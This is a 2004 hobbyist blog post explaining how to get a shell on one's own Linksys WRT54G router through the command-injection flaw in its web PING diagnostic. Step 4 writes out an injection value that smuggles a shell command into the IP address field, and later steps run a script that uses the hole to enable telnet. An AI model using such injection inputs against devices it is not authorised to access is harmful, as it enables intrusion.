Welcome to the CSIR Meraka Institute's "COIN" Blog

Tuesday, August 17, 2004

My experience getting shell prompt on Linksys WRT54G

This amazing little cheap wireless router can be customized with a new version of linux or extra user applications by making use of a PING backdoor. The PING backdoor allows you to send commands to the box through a PING diagnostic command running from its httpd service.

Step 1:

Get the box connected your computer by plugging the supplied ethernet cable into a free network port on your PC and one of the 4 network ports on the Linksys (Not the port which is called internet)

Step 2:

Make sure the port you are using on your PC has DHCP enabled. Your machine will be given an IP address in the range 192.168.1.x. The Linksys is always 192.168.1.1 by default. Try to ping the Linksys box

#ping 192.168.1.1

Step 3:

Open a web browser (make sure your proxy is turned off or set a proxy exception for 192.168.1.1). Open the Linksys web administration page opening the following URL

http://192.168.1.1

Browse around here and check some its cool features.

Step 4:

Now it's time to test out the PING backdoor:

Go to the Administration - Diagnostic screen and click on PING
In the box "IP Address or Domain Name:", type

'ls>tmp/ping.log"

Wow - who would have thought you can execute commands on the box using PING - this backdoor will be exploited later to access the box and upload programs to it.

Step 5:

Download and configure the batbox installation

Batbox site (seems to be problem with dns at the moment)
Local site (alternative location)

Unzip this with

# gunzip < wrt54g-0.51.tar.gz.tar | tar xvf -

Look at the README file
Edit the script wrt54g.sh and make the following changes

PASSWORD=admin

If you have java installed you can leave the script as is If you don't have java but you do have wget installed uncomment the lines

# PROGRAM="wget --quiet ....
# EXTRA="" ....

if you don't have wget or java installed make sure you install these If you are using cygwin: MAke sure ttcp is installed and copy the ttcp program from /usr/bin to the current wrt54g directory

Step 6:

Execute the script # ./wrt54g.sh After the script executes, you should be able to telnet to the box # telnet 192.168.1.1

The script also installs a new page on the web server, access it by going to the following URL

http://192.168.1.1:8000/

Step 7:

Get the cross compiler tools for MIPS from

Batbox site

and start compiling and testing your own applications ...
soon to follow - instructions and transferring your own application - will be based on the batbox script


No comments: